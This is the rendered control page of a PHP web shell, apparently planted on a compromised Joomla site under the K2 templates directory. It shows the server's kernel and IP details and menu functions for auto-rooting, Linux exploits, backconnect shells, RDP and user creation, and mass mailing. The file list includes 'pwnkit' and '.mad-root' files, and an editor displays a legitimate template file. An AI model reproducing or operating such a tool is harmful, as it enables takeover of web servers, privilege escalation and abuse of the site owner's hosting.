Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
components /
com_k2 /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
default
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
generic.php
6.12
KB
-rw----r--
generic_search.php
538
B
-rw----r--
profile.php
7.14
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
register.php
7.31
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generic_search.php
<?php /** * @version 2.9.x * @package K2 * @author JoomlaWorks https://www.joomlaworks.net * @copyright Copyright (c) 2006 - 2018 JoomlaWorks Ltd. All rights reserved. * @license GNU/GPL license: http://www.gnu.org/copyleft/gpl.html */ // no direct access defined('_JEXEC') or die; ?> <?php if(count($this->items)): ?> <ul class="liveSearchResults"> <?php foreach($this->items as $item): ?> <li><a href="<?php echo $item->link; ?>"><?php echo $item->title; ?></a></li> <?php endforeach; ?> </ul> <?php endif; ?>
Close